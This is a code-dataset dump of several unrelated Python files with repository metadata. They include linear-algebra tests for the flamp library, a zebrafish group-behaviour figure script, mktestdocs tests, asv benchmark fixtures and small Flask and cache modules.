40a6afd61732ef0cbfb1b41a760a5a122f098c7d
| 8,329
|
py
|
Python
|
test/test_flamp.py
|
c-f-h/flamp
|
415ca618f95831fe18d4dc0cb83d9f8ef2edd4d8
|
[
"BSD-2-Clause"
] | null | null | null |
test/test_flamp.py
|
c-f-h/flamp
|
415ca618f95831fe18d4dc0cb83d9f8ef2edd4d8
|
[
"BSD-2-Clause"
] | null | null | null |
test/test_flamp.py
|
c-f-h/flamp
|
415ca618f95831fe18d4dc0cb83d9f8ef2edd4d8
|
[
"BSD-2-Clause"
] | null | null | null |
import numpy as np
import gmpy2
from gmpy2 import mpfr, mpc
import flamp
def to_fp(A):
return np.array(A, float)
def to_cpx(A):
return np.array(A, complex)
### linalg
def test_qr_real():
n = 5
A = np.random.rand(n, n)
AA = mpfr(1) * A
Q, R = flamp.qr(AA)
assert Q.shape == (n, n) and R.shape == (n, n)
assert np.allclose(to_fp(Q.T @ Q), np.eye(n))
assert np.allclose(to_fp(Q @ R), A)
assert np.all(np.tril(R, -1) == 0)
## special case: size 0 matrix
AA = flamp.zeros((4, 0))
Q, R = flamp.qr(AA)
assert np.allclose(to_fp(Q), np.eye(4))
assert R.shape == (4, 0)
def test_qr_complex():
n = 5
A = np.random.rand(n, n) + 1j * np.random.rand(n, n)
AA = mpfr(1) * A
Q, R = flamp.qr(AA)
assert Q.shape == (n, n) and R.shape == (n, n)
assert np.allclose(to_cpx(Q.T.conj() @ Q), np.eye(n))
assert np.allclose(to_cpx(Q @ R), A)
assert np.all(np.tril(R, -1) == 0)
def test_inverse_real():
n = 5
A = np.random.rand(n, n)
AA = mpfr(1) * A
Ainv = flamp.inverse(AA)
assert A.shape == (n, n)
assert np.allclose(to_fp(Ainv @ A), np.eye(n))
def test_inverse_complex():
n = 5
A = np.random.rand(n, n) + 1j * np.random.rand(n, n)
AA = mpfr(1) * A
Ainv = flamp.inverse(AA)
assert A.shape == (n, n)
assert np.allclose(to_cpx(Ainv @ A), np.eye(n))
def test_lu_solve_real():
n = 5
A, b = np.random.rand(n, n), np.random.rand(n)
AA = mpfr(1) * A
x = flamp.lu_solve(AA, b)
assert x.shape == (n,)
assert np.allclose(to_fp(A @ x), b)
def test_lu_solve_real_block():
n = 5
A, b = np.random.rand(n, n), np.random.rand(n, 3)
AA = mpfr(1) * A
x = flamp.lu_solve(AA, b)
assert x.shape == (n, 3)
assert np.allclose(to_fp(A @ x), b)
def test_lu_solve_complex():
n = 5
A, b = np.random.rand(n, n) + 1j * np.random.rand(n, n), np.random.rand(n)
AA = mpfr(1) * A
x = flamp.lu_solve(AA, b)
assert x.shape == (n,)
assert np.allclose(to_cpx(A @ x), b)
def test_lu():
n = 5
A = np.random.rand(n, n) + 1j * np.random.rand(n, n)
AA = mpfr(1) * A
P, L, U = flamp.lu(AA)
assert np.allclose(to_cpx(P @ AA), to_cpx(L @ U))
def test_cholesky_solve_real():
n = 5
A, b = np.random.rand(n, n), np.random.rand(n)
A = A.T @ A
AA = mpfr(1) * A
x = flamp.cholesky_solve(AA, b)
assert x.shape == (n,)
assert np.allclose(to_fp(A @ x), b)
def test_cholesky_solve_real_block():
n = 5
A, b = np.random.rand(n, n), np.random.rand(n, 3)
A = A.T @ A
AA = mpfr(1) * A
x = flamp.cholesky_solve(AA, b)
assert x.shape == (n, 3)
assert np.allclose(to_fp(A @ x), b)
def test_qr_solve_real():
n = 5
A, b = np.random.rand(n, n), np.random.rand(n)
AA = mpfr(1) * A
x = flamp.qr_solve(AA, b)
assert x.shape == (n,)
assert np.allclose(to_fp(A @ x), b)
def test_qr_solve_real_block():
n = 5
A, b = np.random.rand(n, n), np.random.rand(n, 3)
AA = mpfr(1) * A
x = flamp.qr_solve(AA, b)
assert x.shape == (n, 3)
assert np.allclose(to_fp(A @ x), b)
def test_solve_real_overdet():
n = 5
A, b = np.random.rand(n + 2, n), np.random.rand(n + 2, 3)
AA = mpfr(1) * A
x = flamp.qr_solve(AA, b)
x2 = flamp.lu_solve(AA, b)
assert x.shape == (n, 3)
assert x2.shape == (n, 3)
assert np.allclose(to_fp(x), to_fp(x2))
def test_det():
n = 5
E = np.random.rand(n) # random eigenvalues
U = mpfr(1) * np.random.rand(n, n)
Uinv = flamp.inverse(U)
A = U @ np.diag(E) @ Uinv
det = flamp.det(A)
assert np.allclose(to_fp(det), np.prod(E))
### eigen
def test_eig_real():
A = mpfr(1) * np.arange(9).reshape((3, 3))
E, UL, UR = flamp.eig(A, left=True, right=True)
assert np.allclose(to_cpx(A @ UR), to_cpx(E[None, :] * UR))
assert np.allclose(to_cpx(UL @ A), to_cpx(E[:, None] * UL))
# compute only eigenvalues
E2 = flamp.eig(A, left=False, right=False)
assert np.all(E == E2)
def test_eig_complex():
A = mpfr(1) * (np.random.rand(5, 5) + 1j * np.random.rand(5, 5))
E, UL, UR = flamp.eig(A, left=True, right=True)
assert np.allclose(to_cpx(A @ UR), to_cpx(E[None, :] * UR))
assert np.allclose(to_cpx(UL @ A), to_cpx(E[:, None] * UL))
# compute only eigenvalues
E2 = flamp.eig(A, left=False, right=False)
assert np.all(E == E2)
def test_hessenberg_real():
n = 5
A = np.random.rand(n, n)
AA = mpfr(1) * A
Q, H = flamp.hessenberg(AA)
assert Q.shape == (n, n) and H.shape == (n, n)
assert np.allclose(to_fp(Q.T @ Q), np.eye(n))
assert np.allclose(to_fp(Q @ H @ Q.T), A)
assert np.all(np.tril(H, -2) == 0)
def test_hessenberg_complex():
n = 5
A = np.random.rand(n, n) + 1j * np.random.rand(n, n)
AA = mpfr(1) * A
Q, H = flamp.hessenberg(AA)
assert Q.shape == (n, n) and H.shape == (n, n)
assert np.allclose(to_cpx(Q.T.conj() @ Q), np.eye(n))
assert np.allclose(to_cpx(Q @ H @ Q.T.conj()), A)
assert np.all(np.tril(H, -2) == 0)
def test_schur():
n = 5
A = np.random.rand(n, n) + 1j * np.random.rand(n, n)
AA = mpfr(1) * A
Q, R = flamp.schur(AA)
assert Q.shape == (n, n) and R.shape == (n, n)
assert np.allclose(to_cpx(Q.T.conj() @ Q), np.eye(n))
assert np.allclose(to_cpx(Q @ R @ Q.T.conj()), A)
assert np.all(np.tril(R, -1) == 0)
### eigen_symmetric
def test_eigh_real():
n = 5
A = np.random.rand(n, n)
A = A + A.T
AA = mpfr(1) * A
E, Q = flamp.eigh(AA)
assert np.allclose(to_fp(Q.T @ Q), np.eye(n))
assert E.shape == (n,)
assert np.allclose(to_fp(Q @ np.diag(E) @ Q.T), A)
# compute only eigenvalues
E2 = flamp.eigh(AA, eigvals_only=True)
assert np.all(E == E2)
def test_eigh_complex():
n = 5
A = np.random.rand(n, n) + 1j * np.random.rand(n, n)
A = A + A.T.conj()
AA = mpfr(1) * A
E, Q = flamp.eigh(AA)
assert np.allclose(to_cpx(Q.T.conj() @ Q), np.eye(n))
assert E.shape == (n,)
assert np.allclose(to_cpx(Q @ np.diag(E) @ Q.T.conj()), A)
# compute only eigenvalues
E2 = flamp.eigh(AA, eigvals_only=True)
assert np.all(E == E2)
def test_svd_real():
n = 5
A = np.random.rand(n, n)
AA = mpfr(1) * A
U, S, V = flamp.svd(AA)
assert np.allclose(to_fp(U.T @ U), np.eye(n))
assert np.allclose(to_fp(V.T @ V), np.eye(n))
assert S.shape == (n,)
assert np.allclose(to_fp((U * S[None, :]) @ V), A)
# compute only singular values
S2 = flamp.svd(AA, compute_uv=False)
assert np.all(S == S2)
def test_svd_complex():
n = 5
A = np.random.rand(n, n) + 1j * np.random.rand(n, n)
AA = mpfr(1) * A
U, S, V = flamp.svd(AA)
assert np.allclose(to_cpx(U.T.conj() @ U), np.eye(n))
assert np.allclose(to_cpx(V.T.conj() @ V), np.eye(n))
assert S.shape == (n,)
assert np.allclose(to_cpx((U * S[None, :]) @ V), A)
# compute only singular values
S2 = flamp.svd(AA, compute_uv=False)
assert np.all(S == S2)
### eigen internals
import flamp.eigen
def test_hessenberg_qr():
A = np.triu(np.ones((3, 3)), -1)
AA = gmpy2.mpfr(1) * A
Q = flamp.eye(3)
flamp.eigen.hessenberg_qr(gmpy2, AA, Q)
assert np.allclose(to_fp(Q.T @ Q), np.eye(3))
assert np.allclose(to_fp(Q @ AA @ Q.T), A)
def test_eig_tr_r():
R = np.triu(np.ones((3, 3)))
U = flamp.eigen.eig_tr_r(gmpy2, gmpy2.mpfr(1) * R)
assert np.allclose(to_fp(U), [[1, -1, 1], [0, 0, 0], [0, 0, 0]])
### utility
def test_prec():
assert flamp.get_precision() == 53
assert flamp.get_dps() == 15
with flamp.extraprec(336 - flamp.get_precision()):
assert flamp.get_precision() == 336
assert flamp.get_dps() == 100
flamp.set_precision(88)
assert flamp.get_precision() == 88
flamp.set_dps(54)
assert flamp.get_dps() == 54
def test_to_mp():
x = flamp.to_mp([3.4, 5.6])
assert x.shape == (2,) and x.dtype == 'O' and np.allclose(to_fp(x), [3.4, 5.6])
x = flamp.to_mp(np.arange(10))
assert x.shape == (10,) and x.dtype == 'O' and x[4] == 4
def test_linspace():
x = flamp.linspace(3, 5, 17)
assert np.allclose(to_fp(x), np.linspace(3, 5, 17))
x = flamp.linspace(4.5, -3.8, 7, endpoint=False)
assert np.allclose(to_fp(x), np.linspace(4.5, -3.8, 7, endpoint=False))
| 29.122378
| 83
| 0.568856
| 1,563
| 8,329
| 2.940499
| 0.079335
| 0.092254
| 0.112272
| 0.164491
| 0.784378
| 0.743037
| 0.712794
| 0.695822
| 0.650131
| 0.63577
| 0
| 0.028504
| 0.241806
| 8,329
| 285
| 84
| 29.224561
| 0.699287
| 0.030856
| 0
| 0.574468
| 0
| 0
| 0.000249
| 0
| 0
| 0
| 0
| 0
| 0.348936
| 1
| 0.12766
| false
| 0
| 0.021277
| 0.008511
| 0.157447
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
40cfaa64c8c89aced37ef2f6cefe394a75d41fcd
| 10,674
|
py
|
Python
|
armin_analysis/figure3_make_figure.py
|
arminbahl/mutant_zebrafish_behavior
|
17bee04b35c23b0f93fcecac9758e6ba19872be1
|
[
"MIT"
] | null | null | null |
armin_analysis/figure3_make_figure.py
|
arminbahl/mutant_zebrafish_behavior
|
17bee04b35c23b0f93fcecac9758e6ba19872be1
|
[
"MIT"
] | null | null | null |
armin_analysis/figure3_make_figure.py
|
arminbahl/mutant_zebrafish_behavior
|
17bee04b35c23b0f93fcecac9758e6ba19872be1
|
[
"MIT"
] | null | null | null |
from pathlib import Path
import numpy as np
from fit_integrator_model import get_model_result, get_target_result
import my_figure as myfig
import matplotlib
import pandas as pd
import pylab as pl
from scipy.stats import sem
# Do a bootstrap test
def bootstrap(vals1, vals2):
combined = np.r_[vals1, vals2]
ds = []
for i in range(10000):
ds.append(np.median(np.random.choice(combined, 12)) - np.median(np.random.choice(combined, 12)))
ds = np.array(ds)
d_real = np.abs(np.median(vals1) - np.median(vals2))
p = (ds > d_real).sum() / len(ds)
print(p)
if p < 0.001:
stars = "***"
elif p < 0.01:
stars = "**"
elif p < 0.05:
stars = "*"
else:
stars = "ns"
return p, stars
root_path = Path("/Users/arminbahl/Desktop/mutant_behavior_data/dot_motion_coherence")
target_path = Path("/Users/arminbahl/Dropbox/pandas_data_for_ariel/paper/figures")
dt = 0.01
time = np.arange(0, 12000*dt, dt)[::10]
time_lowrest = np.arange(0, 119, 1)
chance_distance = 534.361450802352 / 100
chance_polarization = 0.3169689901297303
colors = ["C3", "red", "C4"]
for age in [7, 14, 21]:
fig = myfig.Figure(title=f"Figure 3")
for i, experiment in enumerate(["scn1lab_NIBR_20200708", "scn1lab_zirc_20200710", "disc1_hetinx"]):
polarizations_wt = np.load(root_path / experiment / f"polarizations_wt_age{age}dpf.npy")[:,::10]
neighbor_distances_wt = np.load(root_path / experiment / f"neighbor_distances_wt_age{age}dpf.npy")[:,::10] / 100
speed_over_time_wt = np.load(root_path / experiment / f"speed_over_time_wt_age{age}dpf.npy")[:, :] / 100
if experiment == "scn1lab_NIBR_20200708" or experiment == "scn1lab_zirc_20200710":
polarizations_mutant = np.load(root_path / experiment / f"polarizations_het_age{age}dpf.npy")[:,::10]
neighbor_distances_mutant = np.load(root_path / experiment / f"neighbor_distances_het_age{age}dpf.npy")[:, ::10] / 100
speed_over_time_mutant = np.load(root_path / experiment / f"speed_over_time_het_age{age}dpf.npy")[:, :] / 100
if experiment == "disc1_hetinx":
polarizations_mutant = np.load(root_path / experiment / f"polarizations_hom_age{age}dpf.npy")[:,::10]
neighbor_distances_mutant = np.load(root_path / experiment / f"neighbor_distances_hom_age{age}dpf.npy")[:, ::10] / 100
speed_over_time_mutant = np.load(root_path / experiment / f"speed_over_time_hom_age{age}dpf.npy")[:, :] / 100
# Speed
p0 = myfig.Plot(fig, num='a' if i == 0 else '', xpos=3 + i * 2, ypos=15, plot_height=1.25, plot_width=1.5, title = experiment,
lw=1, pc='white', errorbar_area=True, hlines=[0],
xmin=-1, xmax=121, xticks=[0, 30, 60, 90, 120], xticklabels = [""]*5,
yl="Speed (cm/s)" if i == 0 else None, ymin=-0.1, ymax=0.51, yticks=[0, 0.25, 0.5] if i == 0 else None,
vspans=[[20, 100, "lightgray", 0.6]])
for j in range(12):
myfig.Line(p0, x=time_lowrest, y=speed_over_time_wt[j], lc="black", zorder=1, lw=0.25, alpha=0.25)
myfig.Line(p0, x=time_lowrest, y=speed_over_time_mutant[j], lc=colors[i], zorder=1, lw=0.25, alpha=0.25)
myfig.Line(p0, x=time_lowrest, y=np.mean(speed_over_time_wt, axis=0), yerr=sem(speed_over_time_wt, axis=0), lc="black", zorder=2, label="Wildtype" if i == 2 else None)
myfig.Line(p0, x=time_lowrest, y=np.mean(speed_over_time_mutant, axis=0), yerr=sem(speed_over_time_mutant, axis=0), lc=colors[i], zorder=2, label="Mutant" if i == 2 else None)
# Group spacing
p0 = myfig.Plot(fig, num='b' if i == 0 else '', xpos=3 + i * 2, ypos=13, plot_height=1.25, plot_width=1.5, title = "",
lw=1, pc='white', errorbar_area=True, hlines=[chance_distance],
xmin=-1, xmax=121, xticks=[0, 30, 60, 90, 120], xticklabels = [""]*5,
yl="Group spacing (cm)" if i == 0 else '', ymin=-1, ymax=11, yticks=[0, 5, 10] if i == 0 else None,
vspans=[[20, 100, "lightgray", 0.6]])
for j in range(12):
myfig.Line(p0, x=time, y=neighbor_distances_wt[j], lc="black", zorder=1, lw=0.25, alpha=0.25)
myfig.Line(p0, x=time, y=neighbor_distances_mutant[j], lc=colors[i], zorder=1, lw=0.25, alpha=0.25)
myfig.Line(p0, x=time, y=np.mean(neighbor_distances_wt, axis=0), yerr=sem(neighbor_distances_wt, axis=0), lc="black", zorder=2)
myfig.Line(p0, x=time, y=np.mean(neighbor_distances_mutant, axis=0), yerr=sem(neighbor_distances_mutant, axis=0), lc=colors[i], zorder=2)
# Polarisation
p0 = myfig.Plot(fig, num='c' if i == 0 else '', xpos=3 + i * 2, ypos=11, plot_height=1.25, plot_width=1.5,
lw=1, pc='white', errorbar_area=True, hlines=[chance_polarization],
xl = "Time (s)", xmin=-1, xmax=121, xticks=[0, 30, 60, 90, 120],
yl="Polarization" if i == 0 else None, ymin=0.15, ymax=0.7, yticks=[0.2, 0.4, 0.6] if i == 0 else None,
vspans=[[20, 100, "lightgray", 0.6]])
for j in range(12):
myfig.Line(p0, x=time, y=polarizations_wt[j], lc="black", zorder=1, lw=0.25, alpha=0.25)
myfig.Line(p0, x=time, y=polarizations_mutant[j], lc=colors[i], zorder=1, lw=0.25, alpha=0.25)
myfig.Line(p0, x=time, y=np.mean(polarizations_wt, axis=0), yerr=sem(polarizations_wt, axis=0), lc="black", zorder=2)
myfig.Line(p0, x=time, y=np.mean(polarizations_mutant, axis=0), yerr=sem(polarizations_mutant, axis=0), lc=colors[i], zorder=2)
### Speed stats
p0 = myfig.Plot(fig, num='', xpos=12.0 + i * 1, ypos=15, plot_height=0.75, plot_width=0.5,
lw=1, pc='white', errorbar_area=False, hlines=[0],
xl="", xmin=-0.5, xmax=1.5, xticks=[0, 1],
yl="Speed (cm/s)" if i == 0 else None, ymin=-0.1, ymax=0.51, yticks=[0, 0.25, 0.5] if i == 0 else None)
myfig.Scatter(p0, x=[0]*12, y=np.nanmean(speed_over_time_wt[:, int(80):int(100)], axis=1),
lc='black', pt='o',
lw=0.5, ps=5, pc='white', zorder=2, alpha=0.5)
myfig.Scatter(p0, x=[0], y=np.median(np.nanmean(speed_over_time_wt[:, int(80):int(100)], axis=1)),
lc='black', pt='o',
lw=1, ps=10, pc='white', zorder=2)
myfig.Scatter(p0, x=[1] * 12, y=np.nanmean(speed_over_time_mutant[:, int(80):int(100)], axis=1),
lc=colors[i], pt='o',
lw=0.5, ps=5, pc='white', zorder=2, alpha=0.5)
myfig.Scatter(p0, x=[1], y=np.median(np.nanmean(speed_over_time_mutant[:, int(80):int(100)], axis=1)),
lc=colors[i], pt='o',
lw=1, ps=10, pc='white', zorder=2)
p, stars = bootstrap(np.nanmean(speed_over_time_wt[:, int(20):int(80)], axis=1), np.nanmean(speed_over_time_mutant[:, int(80):int(100)], axis=1))
myfig.Line(p0, x=[0, 1], y=[0.48, 0.48], lc='black', lw=0.75)
myfig.Text(p0, x=0.5, y=0.5, text=stars)
### Spacing stats
p0 = myfig.Plot(fig, num='', xpos=12.0 + i * 1, ypos=13, plot_height=0.75, plot_width=0.5,
lw=1, pc='white', errorbar_area=False,
xl="", xmin=-0.5, xmax=1.5, xticks=[0, 1], hlines=[chance_distance],
yl="Group spacing (cm)" if i == 0 else None, ymin=-1, ymax=11, yticks=[0, 5, 10] if i == 0 else None)
myfig.Scatter(p0, x=[0]*12, y=np.nanmean(neighbor_distances_wt[:, int(80/0.1):int(100/0.1)], axis=1),
lc='black', pt='o',
lw=0.5, ps=5, pc='white', zorder=2, alpha=0.5)
myfig.Scatter(p0, x=[0], y=np.median(np.nanmean(neighbor_distances_wt[:, int(80/0.1):int(100/0.1)], axis=1)),
lc='black', pt='o',
lw=1, ps=10, pc='white', zorder=2)
myfig.Scatter(p0, x=[1] * 12, y=np.nanmean(neighbor_distances_mutant[:, int(80/0.1):int(100/0.1)], axis=1),
lc=colors[i], pt='o',
lw=0.5, ps=5, pc='white', zorder=2, alpha=0.5)
myfig.Scatter(p0, x=[1], y=np.median(np.nanmean(neighbor_distances_mutant[:, int(80/0.1):int(100/0.1)], axis=1)),
lc=colors[i], pt='o',
lw=1, ps=10, pc='white', zorder=2)
p, stars = bootstrap(np.nanmean(neighbor_distances_wt[:, int(80/0.1):int(100/0.1)], axis=1), np.nanmean(neighbor_distances_mutant[:, int(80/0.1):int(100/0.1)], axis=1))
myfig.Line(p0, x=[0, 1], y=[8, 8], lc='black', lw=0.75)
myfig.Text(p0, x=0.5, y=8.5, text=stars)
### Polaeiation stats
p0 = myfig.Plot(fig, num='', xpos=12.0 + i * 1, ypos=11, plot_height=0.75, plot_width=0.5,
lw=1, pc='white', errorbar_area=False, hlines=[chance_polarization],
xl="", xmin=-0.5, xmax=1.5, xticks=[0, 1],
yl="Polarization" if i == 0 else None, ymin=0.15, ymax=0.7, yticks=[0.2, 0.4, 0.6] if i == 0 else None)
myfig.Scatter(p0, x=[0]*12, y=np.nanmean(polarizations_wt[:, int(80/0.1):int(100/0.1)], axis=1),
lc='black', pt='o',
lw=0.5, ps=5, pc='white', zorder=2, alpha=0.5)
myfig.Scatter(p0, x=[0], y=np.median(np.nanmean(polarizations_wt[:, int(80/0.1):int(100/0.1)], axis=1)),
lc='black', pt='o',
lw=1, ps=10, pc='white', zorder=2)
myfig.Scatter(p0, x=[1] * 12, y=np.nanmean(polarizations_mutant[:, int(80/0.1):int(100/0.1)], axis=1),
lc=colors[i], pt='o',
lw=0.5, ps=5, pc='white', zorder=2, alpha=0.5)
myfig.Scatter(p0, x=[1], y=np.median(np.nanmean(polarizations_mutant[:, int(80/0.1):int(100/0.1)], axis=1)),
lc=colors[i], pt='o',
lw=1, ps=10, pc='white', zorder=2)
p, stars = bootstrap(np.nanmean(polarizations_wt[:, int(80/0.1):int(100/0.1)], axis=1),
np.nanmean(polarizations_mutant[:, int(80/0.1):int(100/0.1)], axis=1))
myfig.Line(p0, x=[0, 1], y=[0.6, 0.6], lc='black', lw=0.75)
myfig.Text(p0, x=0.5, y=0.7, text=stars)
fig.savepdf(target_path / f"raw_figure3_age{age}dpf", open_pdf=True)
| 55.59375
| 183
| 0.55771
| 1,716
| 10,674
| 3.359557
| 0.118298
| 0.011101
| 0.04059
| 0.020815
| 0.804683
| 0.776236
| 0.761318
| 0.707892
| 0.662966
| 0.593755
| 0
| 0.096149
| 0.260446
| 10,674
| 191
| 184
| 55.884817
| 0.634153
| 0.008994
| 0
| 0.248175
| 0
| 0
| 0.085952
| 0.051874
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007299
| false
| 0
| 0.058394
| 0
| 0.072993
| 0.007299
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
dc0c9f144e4bffe73f5084a129cb6af532ae3711
| 903
|
py
|
Python
|
tests/test_codeblock.py
|
koaning/mktestdocs
|
96bfc7e43cf6d14053db215b183ba68d9df6c616
|
[
"Apache-2.0"
] | 49
|
2020-12-02T15:47:47.000Z
|
2022-03-18T15:04:25.000Z
|
tests/test_codeblock.py
|
koaning/mktestdocs
|
96bfc7e43cf6d14053db215b183ba68d9df6c616
|
[
"Apache-2.0"
] | null | null | null |
tests/test_codeblock.py
|
koaning/mktestdocs
|
96bfc7e43cf6d14053db215b183ba68d9df6c616
|
[
"Apache-2.0"
] | 5
|
2021-07-20T17:22:09.000Z
|
2021-12-23T14:12:46.000Z
|
import pytest
from mktestdocs import check_codeblock, grab_code_blocks
exibit_a = """
This is an example docstring.
Arguments:
a: a parameter
There is no example
"""
exibit_b = """
This is an example docstring.
Arguments:
a: a parameter
```python
assert 1 == 1
```
"""
exibit_c = """
This is an example docstring.
Arguments:
a: a parameter
```
assert 1 == 1
```
```python
assert 1 == 1
```
"""
@pytest.mark.parametrize(
"doc, n",
[(exibit_a, 0), (exibit_b, 1), (exibit_c, 1)],
ids=["exibit_a", "exibit_b", "exibit_c"],
)
def test_number_of_codeblocks(doc, n):
assert len(grab_code_blocks(doc, lang="python")) == n
@pytest.mark.parametrize(
"doc, n",
[(exibit_a, 0), (exibit_b, 1), (exibit_c, 2)],
ids=["exibit_a", "exibit_b", "exibit_c"],
)
def test_number_of_codeblocks_any(doc, n):
assert len(grab_code_blocks(doc, lang=None)) == n
| 15.842105
| 57
| 0.634551
| 133
| 903
| 4.090226
| 0.308271
| 0.064338
| 0.077206
| 0.082721
| 0.724265
| 0.724265
| 0.724265
| 0.724265
| 0.724265
| 0.356618
| 0
| 0.016575
| 0.198228
| 903
| 56
| 58
| 16.125
| 0.734807
| 0
| 0
| 0.658537
| 0
| 0
| 0.403101
| 0
| 0
| 0
| 0
| 0
| 0.121951
| 1
| 0.04878
| false
| 0
| 0.04878
| 0
| 0.097561
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
9075b8f0a39d008054f44545d40bdbab7bab33de
| 555
|
py
|
Python
|
test/benchmark/named.py
|
asnramos/asv
|
8a0979b532d06c7c352826e2acf0dd872922260e
|
[
"BSD-3-Clause"
] | null | null | null |
test/benchmark/named.py
|
asnramos/asv
|
8a0979b532d06c7c352826e2acf0dd872922260e
|
[
"BSD-3-Clause"
] | null | null | null |
test/benchmark/named.py
|
asnramos/asv
|
8a0979b532d06c7c352826e2acf0dd872922260e
|
[
"BSD-3-Clause"
] | null | null | null |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
class Suite:
def named_method(self):
return 0
named_method.benchmark_name = 'custom.track_method'
def named_function():
pass
named_function.benchmark_name = 'custom.time_function'
named_function.pretty_name = 'My Custom Function'
def track_custom_pretty_name():
return 42
track_custom_pretty_name.pretty_name = 'this.is/the.answer'
class BaseSuite:
def some_func(self):
return 0
class OtherSuite:
track_some_func = BaseSuite.some_func
| 16.323529
| 63
| 0.735135
| 77
| 555
| 5.025974
| 0.467532
| 0.103359
| 0.056848
| 0.108527
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011111
| 0.189189
| 555
| 33
| 64
| 16.818182
| 0.848889
| 0.10991
| 0
| 0.125
| 0
| 0
| 0.152439
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.0625
| 0
| 0.1875
| 0.6875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 4
|
907faeb95020b9a54177f73cacc144571e97126a
| 150
|
py
|
Python
|
ores/score_caches/__init__.py
|
ureesoriano/ores
|
dda9db6c8737d12acbae5b0d43938d93c9e7ea8e
|
[
"MIT"
] | null | null | null |
ores/score_caches/__init__.py
|
ureesoriano/ores
|
dda9db6c8737d12acbae5b0d43938d93c9e7ea8e
|
[
"MIT"
] | null | null | null |
ores/score_caches/__init__.py
|
ureesoriano/ores
|
dda9db6c8737d12acbae5b0d43938d93c9e7ea8e
|
[
"MIT"
] | null | null | null |
from .score_cache import ScoreCache
from .empty import Empty
from .lru import LRU
from .redis import Redis
__all__ = [ScoreCache, Empty, LRU, Redis]
| 21.428571
| 41
| 0.78
| 22
| 150
| 5.090909
| 0.409091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153333
| 150
| 6
| 42
| 25
| 0.88189
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
908a352545ef8649c4693a39d1825c220c064536
| 64
|
py
|
Python
|
runserver.py
|
remram44/internetpoints
|
baae55c4629e0e6d422e60b6ebe4f21d9f63bcef
|
[
"Apache-2.0"
] | 1
|
2021-01-04T00:26:25.000Z
|
2021-01-04T00:26:25.000Z
|
runserver.py
|
remram44/internetpoints
|
baae55c4629e0e6d422e60b6ebe4f21d9f63bcef
|
[
"Apache-2.0"
] | null | null | null |
runserver.py
|
remram44/internetpoints
|
baae55c4629e0e6d422e60b6ebe4f21d9f63bcef
|
[
"Apache-2.0"
] | null | null | null |
from internetpoints.wsgi import application
application.run()
| 12.8
| 43
| 0.828125
| 7
| 64
| 7.571429
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109375
| 64
| 4
| 44
| 16
| 0.929825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
908ef21c393540e2ae754d67c5cf15887926cfad
| 256
|
py
|
Python
|
dingdian/main/forms.py
|
yokonsan/dingdian
|
c1631b0a0dd0a5a6355d4e7f08330ee36c5cbcff
|
[
"MIT"
] | 7
|
2021-03-03T01:42:13.000Z
|
2021-09-04T13:16:16.000Z
|
dingdian/main/forms.py
|
yokonsan/dingdian
|
c1631b0a0dd0a5a6355d4e7f08330ee36c5cbcff
|
[
"MIT"
] | null | null | null |
dingdian/main/forms.py
|
yokonsan/dingdian
|
c1631b0a0dd0a5a6355d4e7f08330ee36c5cbcff
|
[
"MIT"
] | 3
|
2021-02-28T09:24:43.000Z
|
2021-04-18T04:10:34.000Z
|
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
class SearchForm(FlaskForm):
search_name = StringField('search', validators=[DataRequired()])
submit = SubmitField('submit')
| 28.444444
| 68
| 0.792969
| 27
| 256
| 7.444444
| 0.555556
| 0.109453
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 256
| 8
| 69
| 32
| 0.897321
| 0
| 0
| 0
| 0
| 0
| 0.046875
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
